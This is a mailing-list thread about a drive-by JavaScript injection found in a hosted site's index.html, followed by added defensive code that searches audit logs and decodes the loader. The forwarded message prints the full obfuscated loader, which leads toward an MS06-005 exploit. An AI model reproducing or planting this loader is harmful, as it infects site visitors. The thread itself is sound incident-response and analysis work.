<div><font color="#000000">This malicious JS is attempting to have the client's browser make multiple requests to loop through a few systems and <font size="2">eventually tries to exploit the MS06-005 vulnerability - </font>
</font><a title="http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx" href="http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx"><font color="#000000" size="2">http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx
</font></a><font color="#000000" size="2"> by downloading a specially crafted WMV file.</font></div>
<div><font size="2"></font> </div>
<div><font size="2">Now, to answer your questions -</font></div>
<div><font size="2">1) You need to try and identify how this JS code was added to the html page. Was it uploaded through the website in a comment form/blog post, etc...? Or was it added by a local user who could have uploaded a new html page or edited the file locally from a command shell on the web server? In the former case, if you have the ModSecurity SecAuditEngine turned On, then you can do some quick grepping through the audit logs to identify any transactions that have this data present.
</font></div>
<div><font size="2"></font> </div>
<div><font size="2">2) As for ModSecurity rules, the Core Rules (<a href="http://www.modsecurity.org/projects/rules/index.html">http://www.modsecurity.org/projects/rules/index.html</a>) have numerous rules that will identify clients who are attempting to upload this type of malicious code. Identifying/blocking this type of data going OUTBOUND in the html sent to clients is a bit more difficult. See this recent OWASP presentation on Crimeware -
<a href="http://www.owasp.org/images/8/83/OWASP_IL_8_Evasive_Crimeware_attacks_Business_drivers_and_Proposed.pdf">http://www.owasp.org/images/8/83/OWASP_IL_8_Evasive_Crimeware_attacks_Business_drivers_and_Proposed.pdf</a>
. Breach is working on rules to help identify this type of malicious code to help hosting environments. Check out the <a href="http://www.modsecurity.org">www.modsecurity.org</a> site for details.</font> </div>
<div> </div>
<div>-- <br>Ryan C. Barnett<br>ModSecurity Community Manager<br>Breach Security: Director of Application Security Training<br>Web Application Security Consortium (WASC) Member<br>CIS Apache Benchmark Project Lead <br>SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
<br>Author: Preventing Web Attacks with Apache </div>
<div> </div>
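<p>Ryan's first suggestion, grepping the SecAuditEngine output for the injected data, is easier to do reliably if the audit log is first split into transactions, so that a hit can be tied back to a unique ID and a request line. The following is an added example, not code from this thread or from the ModSecurity project: it parses a serial-format audit log (the <code>--boundary-A--</code> to <code>--boundary-Z--</code> part layout), percent-decodes request and response bodies so that a form-encoded upload of the loader is still seen, and reports transactions carrying the two indicators visible in the posted sample (the <code>document.write(unescape(</code> call and the <code>[z0s]</code> comment markers). The log lines, hostnames, addresses and IDs below are constructed for the example.</p>

```javascript
// Added example (not from the list post or from ModSecurity): find transactions in a
// ModSecurity serial-format audit log that carry the injected loader seen in the thread.

// Indicators taken from the posted sample: the loader call and the [z0s] comment markers.
const INDICATORS = [
  /document\.write\s*\(\s*unescape\s*\(/i,
  /<!--\s*\[\/?z0s\]\s*-->/i,
];

// Percent-decode a body for matching only (the original text is left untouched).
// Up to three layers are peeled: a form-encoded POST of an already percent-encoded
// payload is common, and the loader's own argument is percent-encoded once more.
function decodeForMatching(text) {
  let out = text.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(out); } catch (e) { break; } // malformed %-escape: stop here
    if (next === out) break;
    out = next;
  }
  return out;
}

// Split a serial audit log into transactions. Part headers look like "--c7036611-A--";
// A = summary line, B = request headers, C = request body, E = response body, Z = end.
function parseSerialAuditLog(logText) {
  const transactions = [];
  let current = null;
  for (const line of logText.split(/\r?\n/)) {
    const m = /^--([0-9a-f]+)-([A-Z])--$/.exec(line);
    if (m) {
      if (!current || current.boundary !== m[1]) {
        current = { boundary: m[1], part: null, parts: {} };
        transactions.push(current);
      }
      current.part = m[2];
      current.parts[m[2]] = '';
      continue;
    }
    if (current && current.part) current.parts[current.part] += line + '\n';
  }
  return transactions;
}

// One hit per suspicious transaction: unique ID (third field of part A), request line
// (first line of part B) and which body parts matched, either raw or after decoding.
function findInjectionTransactions(logText) {
  const hits = [];
  for (const tx of parseSerialAuditLog(logText)) {
    const matched = [];
    for (const part of ['C', 'E']) {
      const raw = tx.parts[part] || '';
      const views = [raw, decodeForMatching(raw)];
      if (INDICATORS.some((re) => views.some((v) => re.test(v)))) matched.push(part);
    }
    if (matched.length === 0) continue;
    const summary = (tx.parts.A || '').trim().split(/\s+/);
    hits.push({
      uniqueId: summary[2] || '',
      requestLine: (tx.parts.B || '').split('\n')[0],
      matched,
    });
  }
  return hits;
}

// Constructed sample log: one comment-form POST carrying the loader, one clean GET.
const SAMPLE_LOG = [
  '--c7036611-A--',
  '[09/Oct/2007:13:02:44 --0400] RwwWqH8AAAEAAGuKuzsAAAAB 203.0.113.7 52112 198.51.100.10 80',
  '--c7036611-B--',
  'POST /blog/comment.php HTTP/1.1',
  'Host: www.example.com',
  'Content-Type: application/x-www-form-urlencoded',
  '',
  '--c7036611-C--',
  'name=guest&comment=%3C%21--%5Bz0s%5D--%3E%3Cscript%3Edocument.write%28unescape%28%22%253Cscript%253E%22%29%29%3C%2Fscript%3E',
  '--c7036611-F--',
  'HTTP/1.1 200 OK',
  'Content-Type: text/html',
  '',
  '--c7036611-Z--',
  '',
  '--c7036612-A--',
  '[09/Oct/2007:13:03:10 --0400] RwwW0n8AAAEAAGuLuzsAAAAC 203.0.113.9 52300 198.51.100.10 80',
  '--c7036612-B--',
  'GET /index.html HTTP/1.1',
  'Host: www.example.com',
  '',
  '--c7036612-F--',
  'HTTP/1.1 200 OK',
  'Content-Type: text/html',
  '',
  '--c7036612-Z--',
  '',
].join('\n');

console.log(JSON.stringify(findInjectionTransactions(SAMPLE_LOG), null, 2));
```

<p>Part E is only present when SecAuditLogParts includes it, so on a server that logs A, B, C, F, H and Z only the request side can be searched this way; that still answers Ryan's question of whether the script came in through the web application, because a transaction that carries the loader in its body is the upload, and the absence of any such transaction points to a local edit of the file instead.</p>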
<div><br>---------- Forwarded message ----------<br><span class="gmail_quote">From: <b class="gmail_sendername"><a href="mailto:admin@efastservers.com" target="_blank">
admin@efastservers.com</a></b> &lt;<a href="mailto:admin@efastservers.com" target="_blank">admin@efastservers.com</a>&gt;<br>Date: Oct 8, 2007 12:48 PM<br>Subject: [Modsecurity] Some type of file injection vuln going around
<br>To: <a href="mailto:modsecurity@gotroot.com" target="_blank">modsecurity@gotroot.com</a><br><br> </span></div>
<div lang="EN-US" link="blue" vlink="purple">
<div>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">One of my resellers contacted me today stating that one of his websites was hacked and possibly the server. He wanted to know what we were going to do about it.
</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">I checked the server but no other website is affected except for two of his own websites.</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">There seems to be some type of javascript file injection vuln going around. I searched the logs but could not find anything obvious in his logs. I checked all sites and they are clean.
</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Here is what was injected into his index.html file after the &lt;header&gt; tag.</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<pre style="white-space: pre-wrap; word-break: break-all">&lt;/html&gt; &lt;!--[z0s]--&gt;&lt;script&gt;document.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%28gx%29%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Breturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%27aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaNvakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvljvlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%3DArray%2827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227%27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%28%27244%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc%28%27210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%2C16044%5E15945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%2CUNc%28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%5E16015%2C32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28%27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%5E20477%2CUNc%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%27235%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%29%2CUNc%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%27195%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%2C15088%5E14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2CUNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%27207%27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2CUNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%2C31322%5E31459%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%27193%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%27217%27%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28%27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%3Bvar%20QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMaxaCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNaxaMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaWaXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOaxaNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacanaSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaOaMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaFaWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSaialaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlhasaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxajlhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaLaOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amawahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaOaMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlSaraba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNloa6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaRa5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaalSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaIasaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCadaxajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaWlaajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaaaxlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaTawaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%3DString%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%3Bfor%28lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%5D%5E128%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj%29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))&lt;/script&gt;&lt;!--[/z0s]--&gt;</pre>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">There is a small discussion about this at <a href="http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23" target="_blank">
http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23</a></span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Is there a mod_sec rule that can stop this?</span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"> </span></font></p>
<p><font face="Arial" size="2"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Thanks</span></font></p></div></div><br>_______________________________________________<br>Modsecurity mailing list<br><a href="mailto:Modsecurity@gotroot.com" target="_blank">
Modsecurity@gotroot.com</a><br><a href="http://lists.gotroot.com/mailman/listinfo/modsecurity" target="_blank">http://lists.gotroot.com/mailman/listinfo/modsecurity</a>
<br>
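<p>The injected block posted above has two layers: a <code>document.write(unescape("..."))</code> loader, and inside it a small substitution cipher in which every two-character token of <code>MKq</code> selects an index into the alphabet <code>zmW</code> (split on the separator <code>uNq</code>) and the output character is <code>HCR[index] ^ 128</code>, with the <code>HCR</code> entries written either as <code>UNc('243')</code> (a <code>parseInt</code> wrapper) or as <code>a^b</code>. The following is an added example, not code from the list post or from any project named in it, that peels both layers without executing the script. <code>LOADER_SLICE</code> is the opening of the posted loader cut after its first statement, and <code>SAMPLE_LAYER2</code> is the sample's own prelude (alphabet, separator and the complete <code>HCR</code> array, copied from the post) with <code>MKq</code> truncated to its first 16 tokens so that this file does not carry the whole payload; nothing else is assumed beyond those variable names.</p>

```javascript
// Added example (not from the list post): decode the two layers of the injected loader.
// Layer 1 is document.write(unescape("...")); layer 2 is a token-substitution cipher whose
// variable names (zmW, uNq, HCR, MKq) and shapes are the only thing assumed here.

// Opening of the posted loader, copied from the sample and cut after its first statement.
const LOADER_SLICE = 'document.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7B"))';

// Prelude of the layer-2 script as it appears in the sample once unescaped: alphabet,
// separator and the full HCR array. MKq is truncated here to its first 16 tokens.
const SAMPLE_LAYER2 = `if(wA!=1){function Qg(gx){return gx}try{function UNc(IDB){return parseInt(IDB)}var zmW='aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaNvakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvljvlovl7vlVvlJvlOvlbvlHvlmvlw';var uNq=Qg('v'),HCR=Array(27751^27867,UNc('243'),UNc('227'),UNc('242'),UNc('233'),9751^9959,UNc('244'),UNc('190'),UNc('230'),UNc('245'),10675^10589,936^839,21887^21983,UNc('210'),21801^22001,21825^21993,5220^5301,UNc('201'),22845^22929,UNc('202'),16044^15945,UNc('169'),UNc('251'),10351^10393,UNc('225'),UNc('204'),10454^10245,UNc('189'),UNc('247'),4863^4667,29566^29637,UNc('206'),UNc('226'),15905^16015,32317^32489,618^647,32760^32543,UNc('171'),UNc('184'),UNc('182'),20297^20477,UNc('176'),UNc('228'),UNc('235'),UNc('162'),UNc('248'),UNc('199'),UNc('205'),UNc('253'),UNc('195'),30514^30613,UNc('177'),UNc('250'),15088^14857,UNc('213'),UNc('236'),UNc('197'),UNc('175'),UNc('232'),UNc('207'),UNc('173'),UNc('186'),UNc('161'),9002^9109,2844^3015,11165^11075,31322^31459,7836^7745,UNc('220'),UNc('193'),3893^3975,20421^20231,UNc('138'),UNc('217'),24184^24243,UNc('179'),UNc('181'),UNc('183'),6089^5987);var CVS,lXs;var QVT,MKq='aaalaLahaSanagaIa9aRaMaLagaSaiaM';`;

// Layer 1: pull the argument out of document.write(unescape("...")) and unescape it.
function peelUnescapeLayer(html) {
  const m = /document\.write\s*\(\s*unescape\s*\(\s*"([^"]*)"\s*\)\s*\)/.exec(html);
  return m ? unescape(m[1]) : null; // same primitive the loader uses (%XX and %uXXXX)
}

// HCR entries are written as UNc('243') or as a^b; evaluate them without eval.
function parseNumberArray(literalBody) {
  return literalBody.split(',').map((entry) => {
    const e = entry.trim();
    let m = /^UNc\('(\d+)'\)$/.exec(e);
    if (m) return parseInt(m[1], 10);
    m = /^(\d+)\^(\d+)$/.exec(e);
    if (m) return parseInt(m[1], 10) ^ parseInt(m[2], 10);
    throw new Error('unrecognised HCR entry: ' + e);
  });
}

// Layer 2: each 2-character token of MKq selects an index into the alphabet
// (zmW split on uNq); the output character is HCR[index] ^ 128.
function decodeTokens(alphabetString, separator, hcr, tokens) {
  const alphabet = alphabetString.split(separator);
  let out = '';
  for (let i = 0; i < tokens.length; i += 2) {
    let idx = alphabet.indexOf(tokens.substr(i, 2));
    // The loader's inner loop runs off the end of zmW for an unknown token and reads
    // HCR[zmW.length], which is undefined; mirror that (undefined ^ 128 === 128).
    if (idx === -1) idx = alphabet.length;
    out += String.fromCharCode(hcr[idx] ^ 128);
  }
  return out;
}

// Extract the four pieces from an unescaped layer-2 script and decode it.
function decodeLayerTwo(script) {
  const zmW = /zmW='([^']*)'/.exec(script);
  const uNq = /uNq=Qg\('([^']*)'\)/.exec(script);
  const hcr = /HCR=Array\(([\s\S]*?)\);var /.exec(script);
  const mkq = /MKq='([^']*)'/.exec(script);
  if (!zmW || !uNq || !hcr || !mkq) throw new Error('script does not match the sample layout');
  return decodeTokens(zmW[1], uNq[1], parseNumberArray(hcr[1]), mkq[1]);
}

console.log(peelUnescapeLayer(LOADER_SLICE)); // the unescaped head of layer 2
console.log(decodeLayerTwo(SAMPLE_LAYER2));   // first 16 characters of the next stage
```

<p>Run as is, the second line printed is <code>&lt;script&gt;function</code>, the first sixteen characters of the stage that the loader would hand to <code>document.write</code>. Feeding the complete unescaped string from the post to <code>decodeLayerTwo</code> produces the whole next stage; read that output in a text editor rather than rendering it, since it is the part that fetches the exploit Ryan describes.</p>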